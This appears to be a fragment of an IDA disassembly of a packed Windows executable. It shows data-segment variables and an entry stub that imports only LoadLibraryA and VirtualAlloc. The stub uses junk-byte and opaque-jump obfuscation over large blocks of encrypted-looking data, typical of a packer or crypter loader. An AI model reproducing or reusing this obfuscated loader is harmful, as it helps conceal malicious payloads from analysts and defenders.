word_425BB4 dw 0 ; DATA XREF: sub_40468E+33�w
align 4
dword_425BB8 dd 0 ; DATA XREF: sub_40468E+57�w
dword_425BBC dd 0 ; DATA XREF: sub_40468E+70�w
word_425BC0 dw 0 ; DATA XREF: sub_40468E+2C�w
align 4
dd 80h dup(0)
dword_425DC4 dd 0 ; DATA XREF: sub_404A44+15�w
; sub_404A44+1D�w ...
word_425DC8 dw 0 ; DATA XREF: sub_404C69+E7�w
align 4
dd 2 dup(0)
dword_425DD4 dd 0 ; DATA XREF: sub_404C69+C3�w
dword_425DD8 dd 0 ; DATA XREF: sub_404C69+CB�w
dword_425DDC dd 0 ; DATA XREF: sub_404C69+D3�w
dword_425DE0 dd 0 ; DATA XREF: sub_4028A9+6�r
; sub_4029E9+6�r ...
dd 8 dup(0)
dword_425E04 dd 0 ; DATA XREF: sub_4054D6+30�w
; sub_4054D6+51�r ...
dword_425E08 dd 0 ; DATA XREF: sub_4051FF+10�r
; sub_4054D6+3D�w ...
dword_425E0C dd 0 ; DATA XREF: sub_40531A+44�r
; sub_4054D6+4A�w ...
dword_425E10 dd 0 ; DATA XREF: sub_405229+B�r
; sub_4054D6+5E�w ...
align 8
dword_425E18 dd 54h dup(0) ; DATA XREF: sub_405881+4�o
dword_425F68 dd 0 ; DATA XREF: sub_402A45+7C�r
; sub_403603+62�r ...
dword_425F6C dd 0 ; DATA XREF: sub_405ADD+21�w
; sub_405B50+21C�r ...
dword_425F70 dd 0 ; DATA XREF: sub_40773A+14�r
; sub_40773A+29�r ...
dword_425F74 dd 0 ; DATA XREF: sub_40E072+19E�r
dword_425F78 dd 0 ; DATA XREF: J8@F_7_S:00403FE0�w
; sub_407906:loc_40792E�r ...
dword_425F7C dd 0 ; DATA XREF: J8@F_7_S:00403FF7�w
dword_425F80 dd 0 ; DATA XREF: J8@F_7_S:00403FE6�w
dword_425F84 dd 0 ; DATA XREF: J8@F_7_S:00403FEB�w
; sub_40793D+30�r
dword_425F88 dd 0 ; DATA XREF: J8@F_7_S:00403FF1�w
dword_425F8C dd 0 ; DATA XREF: sub_40AE54+A2�w
dword_425F90 dd 0 ; DATA XREF: sub_40AE54+A7�w
align 8
dword_425F98 dd 0 ; DATA XREF: sub_40ABE1+4B�w
; sub_40ABE1:loc_40ACA6�r ...
dd 3 dup(0)
dword_425FA8 dd 0 ; DATA XREF: sub_40AE54+37�w
align 10h
byte_425FB0 db 0 ; DATA XREF: sub_407A0B+2C�w
; sub_40813B+5�r
align 4
dword_425FB4 dd 0 ; DATA XREF: sub_407A0B+23�w
dword_425FB8 dd 0 ; DATA XREF: sub_407A0B+1B�r
; sub_407A0B+A0�w
dword_425FBC dd 0 ; DATA XREF: sub_407F55+27�o
dword_425FC0 dd 0 ; DATA XREF: sub_407F55+22�r
dword_425FC4 dd 0 ; DATA XREF: sub_408058+4�w sub_408062�r
dword_425FC8 dd 0 ; DATA XREF: sub_4081FF+280�w
; sub_40871B:loc_408751�w ...
dd 3 dup(0)
dword_425FD8 dd 6 dup(0) ; DATA XREF: sub_409AB4+66�o
db 0
byte_425FF1 db 3 dup(0) ; DATA XREF: sub_409AB4+8A�o
dd 40h dup(0)
db 0
byte_4260F5 db 0 ; DATA XREF: sub_409AB4+92�w
align 4
dd 7Dh dup(0)
dword_4262EC dd 0 ; DATA XREF: sub_4036E0+80�r
; sub_409AB4+E3�o ...
dword_4262F0 dd 0 ; DATA XREF: sub_40A42B+8�r
align 8
dword_4262F8 dd 41h dup(0) ; DATA XREF: sub_40AE54+1D�o
byte_4263FC db 0 ; DATA XREF: sub_40AE54+24�w
align 10h
dword_426400 dd 0 ; DATA XREF: sub_40AF0D+2�r
; sub_40AF0D+24�w ...
dword_426404 dd 0 ; DATA XREF: sub_40B11E+43�r
; sub_40B18A+11�w ...
byte_426408 db 0 ; DATA XREF: sub_40B11E:loc_40B157�r
; sub_40B18A+17�w ...
align 4
dword_42640C dd 0 ; DATA XREF: sub_40BEA5+C�r
; sub_40BEDC+B�w
dword_426410 dd 0 ; DATA XREF: sub_40BF57+14�r
; sub_40BF57+3A�w ...
dword_426414 dd 0 ; DATA XREF: sub_40C33C+F�r
; sub_40C33C+37�w ...
dword_426418 dd 0 ; DATA XREF: J8@F_7_S:off_423F3C�o
; J8@F_7_S:off_423F40�o ...
dword_42641C dd 0 ; DATA XREF: sub_40CAFA+4�w
; sub_40CB14+11�r ...
dword_426420 dd 0 ; DATA XREF: sub_40D5BD+A�r
dword_426424 dd 0 ; DATA XREF: sub_40DCCF+4�w
; sub_40DD29:loc_40DD72�o ...
dword_426428 dd 0 ; DATA XREF: sub_40DCCF+9�w
; sub_40DD29:loc_40DDC8�o ...
dword_42642C dd 0 ; DATA XREF: sub_40DCCF+E�w sub_40DD1C�r ...
dword_426430 dd 0 ; DATA XREF: sub_40DCCF+13�w
; sub_40DD29:loc_40DDD4�o ...
align 8
dword_426438 dd 0 ; DATA XREF: sub_40DED9+4�w
dd 2 dup(0)
dword_426444 dd 0 ; DATA XREF: sub_40DEE3+4�w
dd 0Fh dup(0)
dword_426484 dd 0 ; DATA XREF: sub_4081FF+6�r
dword_426488 dd 0 ; DATA XREF: sub_40F524+10�r
; sub_40F524+60�w ...
dword_42648C dd 0 ; DATA XREF: sub_40F524+75�w
; sub_40F524:loc_40F672�r
dword_426490 dd 0 ; DATA XREF: sub_40F524+82�w
; sub_40F524+167�r
dword_426494 dd 0 ; DATA XREF: sub_40F524+D0�w
; sub_40F524:loc_40F5F9�r
dword_426498 dd 0 ; DATA XREF: sub_40F524+BA�w
; sub_40F524+E1�r ...
align 10h
dword_4264A0 dd 0 ; DATA XREF: sub_40F76B+F�w
dd 2Fh dup(0)
dword_426560 dd 0 ; DATA XREF: sub_410889:loc_4108B1�r
byte_426564 db 0 ; DATA XREF: sub_410A54:loc_410B90�r
align 4
dword_426568 dd 0 ; DATA XREF: sub_419A10+4B�r
; sub_419EA0+E6�w ...
dword_42656C dd 0 ; DATA XREF: sub_419948+14�r
; sub_4199AC+14�r ...
dword_426570 dd 0 ; DATA XREF: sub_4198D2+1D�r
; sub_419EA0+136�w ...
dword_426574 dd 0 ; DATA XREF: sub_419A10+1C�r
; sub_419EA0+AA�w ...
dword_426578 dd 0 ; DATA XREF: sub_419EA0+BE�w
; sub_419EA0+16D�r ...
dword_42657C dd 0 ; DATA XREF: sub_419EA0+D2�w
; sub_419EA0+179�r ...
dword_426580 dd 0 ; DATA XREF: sub_419948+34�r
; sub_4199AC+34�r ...
dword_426584 dd 0 ; DATA XREF: sub_419A10+63�r
; sub_419EA0+FA�w ...
dword_426588 dd 0 ; DATA XREF: sub_419EA0+14A�w
; sub_419EA0+322�r
dword_42658C dd 0 ; DATA XREF: sub_419EA0+96�w
; sub_419EA0+155�r ...
dword_426590 dd 0 ; DATA XREF: sub_419948+4D�r
; sub_4199AC+4D�r ...
dword_426594 dd 0 ; DATA XREF: sub_401C1D+6D�r
; sub_418B1F+A9�w ...
dword_426598 dd 0 ; DATA XREF: sub_401CC0+14F�r
; sub_41748B+11D�r ...
dword_42659C dd 0 ; DATA XREF: sub_401CC0+149�r
; sub_41748B+116�r ...
dword_4265A0 dd 0 ; DATA XREF: sub_401CC0+143�r
; sub_418DA0+61�w
dword_4265A4 dd 0 ; DATA XREF: sub_401CC0+13D�r
; sub_418DA0+66�w
dword_4265A8 dd 0 ; DATA XREF: sub_401CC0+137�r
; sub_418DA0+71�w
dword_4265AC dd 0 ; DATA XREF: sub_401CC0+12A�r
; sub_418DA0+76�w
dword_4265B0 dd 0 ; DATA XREF: sub_418D5A�r
; sub_418D5A:loc_418D8F�w ...
dword_4265B4 dd 0 ; DATA XREF: sub_418D5A+5�r
; sub_418D5A+3B�w ...
dword_4265B8 dd 0 ; DATA XREF: sub_418D5A+15�r
; sub_4192FB+20�w ...
dword_4265BC dd 0 ; DATA XREF: sub_4192FB+25�w
dd 33h dup(0)
dword_42668C dd 2 dup(0) ; DATA XREF: sub_4192FB+43�o
word_426694 dw 0 ; DATA XREF: sub_41835D+8�o
; sub_418B1F+AE�w ...
word_426696 dw 0 ; DATA XREF: sub_418B1F+D1�w
dword_426698 dd 0 ; DATA XREF: sub_418B1F+BD�w
dd 2 dup(0)
dword_4266A4 dd 0 ; DATA XREF: sub_418C40+6�r
; sub_418C40+73�r ...
dword_4266A8 dd 41h dup(0) ; DATA XREF: sub_418552+1ED�o
; sub_418552+224�o ...
dword_4267AC dd 0 ; DATA XREF: sub_41835D+D�r
; sub_418B1F+84�w ...
byte_4267B0 db 0 ; DATA XREF: sub_418552+293�o
; sub_418552+477�o ...
align 4
dd 40h dup(0)
byte_4268B4 db 0 ; DATA XREF: sub_401F1C:loc_401F83�r
; sub_418B1F+117�w ...
align 4
dword_4268B8 dd 41h dup(0) ; DATA XREF: sub_418552:loc_41876F�o
; sub_418B1F+1A�o
dword_4269BC dd 0 ; DATA XREF: sub_401C1D+47�r
; sub_401CC0+F4�r ...
byte_4269C0 db 0 ; DATA XREF: J8@F_7_S:00413F6A�r
; sub_418301:loc_418331�r ...
align 4
dd 8 dup(0)
dword_4269E4 dd 0 ; DATA XREF: sub_41B5D2+33�w
; sub_41B5D2+8F�r ...
dword_4269E8 dd 40h dup(0) ; DATA XREF: sub_41B3D0+49�o
; sub_41B775+21�o
byte_426AE8 db 0 ; DATA XREF: sub_41A391+D7�o
; sub_41A391+132�w ...
align 4
dd 3Fh dup(0)
dword_426BE8 dd 0 ; DATA XREF: sub_401CC0+170�r
; sub_41A391+45�o
dword_426BEC dd 0 ; DATA XREF: sub_401CC0+17E�r
; sub_41A391:loc_41A51C�w ...
byte_426BF0 db 0 ; DATA XREF: sub_401F1C+4B7�w
align 4
dd 3Fh dup(0)
dword_426CF0 dd 0 ; DATA XREF: sub_401F1C+44A�r
; sub_401F1C+483�w
dd 3 dup(0)
db 0
byte_426D01 db 0 ; DATA XREF: sub_401F1C:loc_4020A2�r
; sub_40243A+AF�w
align 10h
dword_426D10 dd 0 ; DATA XREF: sub_40243A:loc_4024C3�r
dd 330Bh dup(0)
dword_433940 dd 0 ; DATA XREF: sub_40251A+A6�r
; sub_418552+501�r ...
db 0
byte_433945 db 0 ; DATA XREF: sub_401F1C+3E�r
; sub_41B5D2:loc_41B60E�w ...
align 4
dword_433948 dd 0 ; DATA XREF: sub_41B5D2+13B�w
dword_43394C dd 0 ; DATA XREF: sub_40251A+90�r
; sub_41B3D0:loc_41B53E�w ...
dword_433950 dd 5Eh dup(0) ; DATA XREF: sub_41A9DE+48A�o
dword_433AC8 dd 5Dh dup(0) ; DATA XREF: sub_41A9DE+4AD�o
dword_433C3C dd 0 ; DATA XREF: sub_417676+110�o
; sub_41BB84+43�o ...
dword_433C40 dd 0 ; DATA XREF: sub_417676+109�r
; sub_417676+122�r ...
dword_433C44 dd 0 ; DATA XREF: sub_40121E+20�r
; sub_40121E:loc_40127B�w ...
dword_433C48 dd 0 ; DATA XREF: sub_413F8F+14�o
; sub_414042+15�o ...
dword_433C4C dd 0 ; DATA XREF: sub_40243A:loc_402453�r
; sub_40243A:loc_402462�r ...
dword_433C50 dd 0 ; DATA XREF: sub_4016BA+20�r
; sub_4016BA:loc_401717�w ...
dword_433C54 dd 0 ; DATA XREF: J8@F_7_S:0041C3CC�o
; J8@F_7_S:0041C3D6�w
dword_433C58 dd 0 ; DATA XREF: J8@F_7_S:0041C3B0�o
; J8@F_7_S:0041C3BA�w
dword_433C5C dd 0 ; DATA XREF: J8@F_7_S:0041C3E8�o
; J8@F_7_S:0041C3F2�w
dword_433C60 dd 0 ; DATA XREF: J8@F_7_S:0041C404�o
; J8@F_7_S:0041C40E�w
dword_433C64 dd 0 ; DATA XREF: J8@F_7_S:0041C420�o
; J8@F_7_S:0041C42A�w
dword_433C68 dd 0 ; DATA XREF: sub_41A9DE+4FD�r
; J8@F_7_S:0041C43E�w
dword_433C6C dd 0 ; DATA XREF: J8@F_7_S:0041C466�o
; J8@F_7_S:0041C470�w
dword_433C70 dd 0 ; DATA XREF: J8@F_7_S:0041C482�o
; J8@F_7_S:0041C48C�w
dword_433C74 dd 0 ; DATA XREF: J8@F_7_S:0041C44A�o
; J8@F_7_S:0041C454�w
dword_433C78 dd 0 ; DATA XREF: sub_403DA0�r sub_40A6DB�w ...
dword_433C7C dd 0 ; DATA XREF: sub_407370+28�r
; sub_407B70+1E�r ...
dword_433C80 dd 0 ; DATA XREF: sub_40A42B+34�r
dword_433C84 dd 0 ; DATA XREF: sub_4087E0+3C�w
; sub_4087E0+BF�w ...
dd 6 dup(0)
dword_433CA0 dd 0 ; DATA XREF: sub_4067D6+FD�r
; sub_40808A+87�r ...
dd 3Fh dup(0)
dword_433DA0 dd 0 ; DATA XREF: sub_40808A+2B�w
; sub_40808A+44�w ...
dd 7 dup(0)
dword_433DC0 dd 400h dup(0) ; DATA XREF: J8@F_7_S:off_423950�o
; J8@F_7_S:00423958�o
dword_434DC0 dd 0 ; DATA XREF: sub_40808A�r
; sub_40808A:loc_4080A4�w ...
dword_434DC4 dd 0 ; DATA XREF: sub_407B65�w
dword_434DC8 dd 0 ; DATA XREF: sub_40ABE1+B3�w
dword_434DCC dd 0 ; DATA XREF: sub_402D09+10�r
; sub_402D09+9B�w ...
dword_434DD0 dd 0 ; DATA XREF: sub_402D09+5�r
; sub_402D09+87�w ...
dword_434DD4 dd 0 ; DATA XREF: sub_404E03�r
; sub_404E03+11�w ...
dword_434DD8 dd 0 ; DATA XREF: sub_407979:loc_4079E2�r
; sub_407979+74�o ...
dword_434DDC dd 0 ; DATA XREF: sub_405ADD+28�w
; sub_405B25�r ...
dword_434DE0 dd 0 ; DATA XREF: sub_405ADD+15�w
; sub_405B25+6�r ...
dword_434DE4 dd 0 ; DATA XREF: sub_403691+13�r
; sub_405ADD+36�w ...
dword_434DE8 dd 0 ; DATA XREF: sub_405ADD+2F�w
; sub_405B50+2FC�w ...
dword_434DEC dd 0 ; DATA XREF: sub_405ADD+3C�w
; sub_405E64�r ...
dword_434DF0 dd 0 ; DATA XREF: sub_405B50+229�r
; sub_405B50+249�r ...
dword_434DF4 dd 0 ; DATA XREF: sub_402A45:loc_402A7E�r
; sub_403603+13�r ...
dword_434DF8 dd 0 ; DATA XREF: J8@F_7_S:0040404B�w
; sub_40AB84:loc_40AB95�r ...
align 400h
J8@F_7_S ends
; Section 4. (virtual address 00035000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00001000 ( 4096.)
; Offset to raw data for section: 00035000
; Flags C00000E0: Text Data Bss Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Uninitialized
; Segment permissions: Read/Write
J8@F_7_S segment para public 'BSS' use32
assume cs:J8@F_7_S
;org 435000h
assume es:nothing, ss:nothing, ds:J8@F_7_S, fs:nothing, gs:nothing
dd 2 dup(0)
dd 4, 10000h, 18h, 80000018h, 2 dup(0)
dd 4, 10000h, 1, 80000030h, 2 dup(0)
dd 4, 10000h, 409h, 48h, 35058h, 56h, 4E4h, 0
aAssemblyXmlnsU db '<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersio'
db 'n="1.0">',0Dh,0Ah
db '</assembly>PA',0
align 4
dd 181h dup(0)
db 3 dup(0)
byte_4356BB db 0 ; DATA XREF: sub_40251A+E6�o
align 1000h
J8@F_7_S ends
; Section 5. (virtual address 00036000)
; Virtual size : 0000A000 ( 40960.)
; Section size in file : 0000A000 ( 40960.)
; Offset to raw data for section: 00036000
; Flags C00000E0: Text Data Bss Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Uninitialized
; Segment permissions: Read/Write
J8@F_7_S segment para public 'BSS' use32
assume cs:J8@F_7_S
;org 436000h
assume es:nothing, ss:nothing, ds:J8@F_7_S, fs:nothing, gs:nothing
dd 36028h, 2 dup(0)
dd 3604Fh, 36028h, 5 dup(0)
dd 77E805D8h, 77E7980Ah, 0
aLoadlibrarya db 'LoadLibraryA',0
align 2
aVirtualalloc db 'VirtualAlloc',0
aKernel32_dl_11 db 'KERNEL32.dll',0
; ---------------------------------------------------------------------------
public start
start:
clc
jnb short near ptr loc_43605F+1
loc_43605F: ; CODE XREF: J8@F_7_S:0043605D�j
xor bl, dh
xor cl, 97h
rep or eax, ecx
jmp short loc_43606B
; ---------------------------------------------------------------------------
db 0ECh, 93h
; ---------------------------------------------------------------------------
loc_43606B: ; CODE XREF: J8@F_7_S:00436067�j
repne xor eax, 13h
rep rol eax, 17h
jmp short loc_436076
; ---------------------------------------------------------------------------
db 9
; ---------------------------------------------------------------------------
loc_436076: ; CODE XREF: J8@F_7_S:00436073�j
repne sub cl, 53h
lea esi, dword_43625C
repne sub ecx, 73h
xchg eax, ecx
repne rol ecx, 12h
shl eax, 1Dh
lea ebx, large ds:400h
call loc_436099
sub al, 96h
loc_436099: ; CODE XREF: J8@F_7_S:00436092�p
pop ecx
call loc_4360A1
; ---------------------------------------------------------------------------
db 0C4h
db 0E2h
; ---------------------------------------------------------------------------
loc_4360A1: ; CODE XREF: J8@F_7_S:0043609A�p
pop ecx
stc
jb short loc_4360A6
cld
loc_4360A6: ; CODE XREF: J8@F_7_S:004360A3�j
repne imul eax, 5Bh
lea edi, large ds:0
jmp short loc_4360B4
; ---------------------------------------------------------------------------
dw 0FA5Fh
; ---------------------------------------------------------------------------
loc_4360B4: ; CODE XREF: J8@F_7_S:004360B0�j
jmp short loc_4360B8
; ---------------------------------------------------------------------------
dw 20CDh
; ---------------------------------------------------------------------------
loc_4360B8: ; CODE XREF: J8@F_7_S:loc_4360B4�j
clc
jnb short near ptr loc_4360BB+1
loc_4360BB: ; CODE XREF: J8@F_7_S:004360B9�j
jmp near ptr 0F24A1ECFh
; ---------------------------------------------------------------------------
dd 0C38BDF0Bh, 0C88348F2h, 0C03BF349h, 0F3C11BF2h, 7FC181h
dd 2EB0000h, 73F8604Fh, 168A0401h, 1E8h, 0F595800h, 2EBC9B6h
dd 2EB6667h, 73F820CDh, 0C20BCC01h, 2E8h, 59DAB400h, 0FB0172F9h
dd 0FEC281F3h, 0EB353527h, 0EB20CD02h, 0EB352702h, 49A6A402h
dd 73F8D32Ah, 73F86A01h, 0C0138D01h, 7F183F3h, 8DF8EA81h
dd 72F97DEBh, 72F96F01h, 0BE0F8D01h, 0CD02EBCAh, 7AC28020h
dd 2E8h, 58DFBE00h, 0E85B01EBh, 2, 0F3589122h, 80B6E183h
dd 2EB3BEAh, 2EB20CDh, 1EBF2DAh, 172F95Bh, 0F2C281CBh
dd 0F33342FDh, 0E83FE083h, 1, 0BE0F58A1h, 8C02EBC3h, 0E3EA8163h
dd 0C1670E18h, 72F906F1h, 38347001h, 0EA81C223h, 47F9A2E3h
dd 0F8C833F2h, 0C1340173h, 73F81FF1h, 0EA808F01h, 0E980F223h
dd 0CBBE0F03h, 1E8h, 0F858B600h, 2AF60173h, 172F9D3h, 173F80Fh
dd 0BE0FF3E1h, 0CD02EBC9h, 0EBD32A20h, 0EBDAAB02h, 0F8BDAA02h
dd 0F3B50173h, 0C281D9F7h, 36353DC2h, 4FC083F3h, 0F96A01EBh
dd 808D0172h, 16880DC1h, 20CD02EBh, 17E8C1F3h, 0F3C9B60Fh
dd 0F946D70Ch, 0E8F30172h, 2, 0EB5967CFh, 0F25B4C02h, 4BF35B2Ch
dd 682491F3h, 0EBC1B60Fh, 8336D902h, 1EB00F3h, 0CD02EBB6h
dd 0BE0FF220h, 0B60FF2C0h, 0CD02EBC8h, 0D002EB20h, 0EBC98BB7h
dd 850FB701h, 0FFFFFE84h, 0B60173F8h, 0F9B601EBh, 0E8B60172h
dd 2, 0F8598E1Dh
dword_43625C dd 2E8h, 5F0D1A00h, 26CF81F3h, 0F393FD5Fh, 0F317CEC1h
; DATA XREF: J8@F_7_S:0043607A�o
dd 2EBFE85h, 2EB20CDh, 73F89FF2h, 1EBFE01h, 0CF01EB7Fh
dd 0B90173F8h, 2078E781h, 2BF20B2Dh, 0EE83F2F1h, 0B202EB5Ah
dd 172F940h, 202EB16h, 173F855h, 0FF1BF2A0h, 20CD02EBh
dd 3AA902EBh, 665C68F2h, 2EB0043h, 72F920CDh, 0B70F9D01h
dd 0FE87F3FFh, 0E60172F9h, 20CD02EBh, 0CE6C14Fh, 76202EBh
dd 0C0EC02EBh, 0F338B5Bh, 0FE1B33B6h, 9A0172F9h, 20CD02EBh
dd 1ECEC1F3h, 990173F8h, 0F8F9B60Fh, 0F3150173h, 0B807C7C1h
dd 9882h, 9C2D02EBh, 9F9CE781h, 2EB0ADCh, 0CE81C9F9h, 0C9h
dd 6E0172F9h, 83AD01EBh, 81F260C7h, 0CBC7h, 173F800h, 173F852h
dd 172F9EAh, 0CF7C11Dh, 0EBF10BF3h, 0F6239C01h, 63C683F2h
dd 0FCEC1F3h, 6A0172F9h, 0CD0173F8h, 8A10EEC1h, 1C7830Bh
dd 23F2FA8Bh, 0CF81F2F1h, 0A3h, 0F0B60FF2h, 20CD02EBh
dd 2EBFB8Bh, 0F78B3BC4h, 3B0173F8h, 0F9DFF7F3h, 0F2B80172h
dd 52A2F781h, 0BF0F61C2h, 173F8F6h, 901EB4Ah, 1E847F3h
dd 0A6000000h, 172F95Fh, 7DF66BF4h, 0AFE981F3h, 4773FC40h
dd 0E781F3F3h, 7Fh, 1C0172F9h, 0EF81F123h, 0DA96AEE4h
dd 6AEE02EBh, 5D0173F8h, 0EBFE87F2h, 0F920CD02h, 816A0172h
dd 5205DAC1h, 172F972h, 1E82Eh, 5E810000h, 0E83BB60Fh
dd 1, 1EB5E72h, 172F98Eh, 0C781F331h, 2C8266D6h, 8119EF83h
dd 174590CEh, 33B60FACh, 74E980F2h, 2B0502EBh, 0F3FF3BF3h
dd 0DDE781h, 2EB0000h, 73F89453h, 1EB8A01h, 0EBD6F751h
dd 0F320CD02h, 357EE83h, 0E980F3F7h, 0F8FE852Fh, 0EB090173h
dd 83F30C01h, 0C1F327CFh, 46F307E7h, 0CE81F2F3h, 0CFh
dd 2B19F7C1h, 0ACCE81FEh, 2A8EA9A5h, 0CD02EBC8h, 0CD02EB20h
dd 0D202EB20h, 172F954h, 5302EB9Ah, 172F91Dh, 7502EBAAh
dd 0BE0F4694h, 0CFC1F23Bh, 0F180F202h, 4102EB56h, 0BE0FF273h
dd 173F8F8h, 173F8CEh, 3BBE0FB9h, 20CD02EBh, 66C002EBh
dd 173F84Eh, 0CB01EB8Ch, 50B2C181h, 0E7C16F44h, 173F814h
dd 6BFA2B11h, 2EB6DF6h, 0F32B20CDh, 87FA13F2h, 4602EBFEh
dd 173F89Eh, 0F2F181C8h, 0F2DEC894h, 9102EB47h, 0BD01EBBDh
dd 0F9F3B60Fh, 81540172h, 7151BCE6h, 1B02EBE8h, 172F915h
dd 5402EBA3h, 32F7031Ch, 0E801EBC8h, 0FFBF0FF3h, 2E8h
dd 5F860C00h, 0B00173F8h, 0EBFA33F2h, 83F37D01h, 2EB4FC6h
dd 83F320CDh, 1EB5FF7h, 0EBC82A76h, 2EB1701h, 2EBD682h
dd 0F3F25AD0h, 0D15ACE83h, 0B60FF3CFh, 172F9F0h, 0CD02EBFAh
dd 172F920h, 172F97Fh, 0BE9802Fh, 20CD02EBh, 0BFF0BF3h
dd 0B502EBF3h, 3BF78558h, 0CD02EBFEh, 173F820h, 1E866h
dd 5F830000h, 300173F8h, 1EB0B88h, 3602EBB6h, 0CD02EBDFh
dd 172F920h, 0E683F27Ch, 0CE8103h, 83E87E53h, 0B70F29C7h
dd 10EEC1FFh, 0F2FE13F3h, 173F843h, 172F9BBh, 173F877h
dd 0CD02EB2Eh, 0B101EB20h, 0F9FF33F2h, 0EB430172h, 1B858802h
dd 1CC7C1F9h, 2EB48F3h, 0EE8120CDh, 8FF455ACh, 5A0173F8h
dd 0F45502EBh, 8FF4E681h, 73F849F8h, 2EBFF01h, 2 dup(2EB20CDh)
dd 47F33F11h, 3BF62BF2h, 3902EBC6h, 0F1B60F5Bh, 0FFBF0FF3h
dd 0FFBF0FF2h, 8BD501EBh, 1E8F7h, 5EF60000h, 7A3F02EBh
dd 2 dup(20CD02EBh), 1E8h, 0F5FBD00h, 2EBF6B7h, 0FF28361h
dd 2EBF7BFh, 0B70FB490h, 1DC7C1FFh, 0F36901EBh, 0FFFBF0Fh
dd 850FF7B7h, 0FFFFFCF5h, 0FFB70FF3h, 83F3DFF7h, 1EB4FCEh
dd 0CD02EB8Eh, 2401EB20h, 811CF7C1h, 0DCC6h, 173F800h
dd 2B01EB5Dh, 9AACB855h, 0B991DEh, 35000002h, 919E9AACh
dd 32FFCA83h, 0D3FF0154h, 0E8F8E2C2h, 0F2h, 6028BDFCh
dd 406A0043h, 300068h, 20006800h, 8B510001h, 3A800455h
dd 0C1940FCCh, 0D2FFD103h, 756958Dh, 52500000h, 748B6050h
dd 7C8B2424h, 0CD832824h, 0F9C933FFh, 68A0CEBh, 47078846h
dd 973DB02h, 1E8AF475h, 72DB1246h, 1B8EDh, 0DB020000h
dd 1E8A0575h, 13DB1246h, 73DB02C0h, 8A0775F1h, 0DB12461Eh
dd 0E883E873h, 0C10D7203h, 68A08E0h, 0FFF08346h, 0E88B6E74h
dd 575DB02h, 12461E8Ah, 2C913DBh, 8A0575DBh, 0DB12461Eh
dd 1C75C913h, 75DB0241h, 461E8A05h, 0C913DB12h, 0F173DB02h
dd 1E8A0775h, 73DB1246h, 2C183E8h, 0F300FD81h, 0D183FFFFh
dd 3D548D01h, 0FCFD8300h, 28A0E76h, 47078842h, 0E9F77549h
dd 0FFFFFF70h, 0C283028Bh, 83078904h, 0E98304C7h, 3F17704h
dd 0E9C933F9h, 0FFFFFF58h, 28247C2Bh, 1C247C89h, 0B958C361h
dd 0F2h, 0FF015428h, 0F8E2C2D3h, 2EBC350h, 7C83AE9Dh, 0EB000424h
dd 0EBAE9D02h, 98689D01h, 0EB77E79Fh, 0C320CD02h, 2 dup(0AE9D02EBh)
dd 67AC6855h, 2EB0043h, 0C320CDh, 2EBEC8Bh, 75FFAE9Dh
dd 0CD02EB08h, 9D02EB20h, 0A83D68AEh, 0CD6877E7h, 0EB004367h
dd 0C320CD02h, 2EBC300h, 2EB20CDh, 0C15520CDh, 0EC8B00F0h
dd 20CD02EBh, 0EB1075FFh, 0FFAE9D02h, 2EB0C75h, 75FFAE9Dh
dd 9D01EB08h, 2EBFF6Ah, 0F0C1AE9Dh, 3640E900h, 0F0C177A4h
dd 0F0C100h, 0F0C155h, 2EBEC8Bh, 75FF20CDh, 9D02EB14h
dd 1075FFAEh, 0AE9D02EBh, 0EB0C75FFh, 75FF9D01h, 0CD02EB08h
dd 0EBFF6A20h, 2EB9D01h, 1B68AE9Dh, 0EB77E798h, 0C3AE9D02h
dd 0AE9D02EBh, 43684F68h, 0CD02EB00h, 8300C320h, 4247Ch
dd 539D01EBh, 0AE9D02EBh, 0F0C156h, 20CD02EBh, 0E805DF68h
dd 9D02EB77h, 7968C3AEh, 0EB004368h, 0C320CD02h, 0D31CD600h
dd 43DF1AB5h, 7C8B9304h, 0EB10FE24h, 0E881F202h, 0E232ED01h
dd 0FC25BF8Fh, 725703EBh, 0F122BB7h, 0F6A6238Ah, 424648Dh
dd 4DFE3209h, 926ECF9h, 0C1ED2C67h, 0DB2E00F1h, 5C0387C7h
dd 20CD9F97h, 64C11863h, 368DC92Ch, 23D5D15h, 3BB2AD8h
dd 0DB29B21Fh, 0A5978003h, 80FE915Eh, 840FFF3Fh, 21D60458h
dd 3A903626h, 6893094Ch, 332F626h, 7B037AFBh, 0F5BD6D01h
dd 9DF4C1F0h, 1D9E2231h, 3EBAC0Fh, 211B11A4h, 4DAF3EC8h
dd 560EC6BFh, 5B1C52F7h, 0D8B8124Eh, 0FB471547h, 75EE3503h
dd 2AAA1B1Bh, 430A57E1h, 4484363Bh, 1B16926Bh, 680753ABh
dd 7103F770h, 0F7322501h, 600F7C1h, 730372FDh, 8BB5A01h
dd 1B263A3Eh, 453D59E6h, 0D3F993E6h, 374117Fh, 6E01D875h
dd 47ECD90Eh, 717F8FEDh, 0E42131FFh, 1770376h, 37557508h
dd 5B2B0DBDh, 0A451C1F7h, 0FD75AE7Bh, 49381B28h, 8036031Fh
dd 350E6324h, 6AC9FB64h, 66890F7Bh, 1FC93226h, 9B2FA384h
dd 7CFE092Bh, 0E1017D03h, 4A9226C9h, 0FD46D26Ch, 0F6C1058Ch
dd 0C03C7B8h, 0EC0B3D56h, 6C19DFE9h, 1C9B23E3h, 10B306F4h
dd 0B19E4662h, 810BB216h, 0CEFF037Ch, 0D975211Dh, 943636D7h
dd 8D9C1DF2h, 18E19B0Eh, 0EA6EC36h, 1D232463h, 0C28300F3h
dd 56036E30h, 0C948DEF7h, 0CEB7C2Fh, 0C41B2122h, 0B60FF83Fh
dd 0AD90D007h, 3AEC191Dh, 6C154FC0h, 0EE9BD723h, 9741DC09h
dd 0BE017990h, 0EE5E9AFBh, 0F7C1963Ah, 49F187CEh, 0F0F54D84h
dd 0AFBE9BF4h, 0B4F4C03h, 0E78224DFh, 7FB5037Eh, 2937F6C8h
dd 43D7E10Dh, 89F51BC6h, 417210B7h, 3C524B69h, 4AFC425Dh
dd 6C2E123Ch, 3F7E919h, 0D15E1E1Dh, 84C6F615h, 1DD55376h
dd 2017BB5Ch, 0ED7860A9h, 49767A94h
dd 93771D39h, 2D083AADh, 0C06C0D6Ch, 0C5F39B9Dh, 0BF32F21Bh
dd 1F89E5EDh, 5A6C783h, 0A7030DBFh, 386BB4BAh, 29D8DB30h
dd 6154D1C6h, 0D673FB6Fh, 0D8A41E34h, 36604BF2h, 6C4D6AA1h
dd 18BA5C93h, 0F7C15E2Eh, 37782C13h, 49D073FBh, 0C71BF77Bh
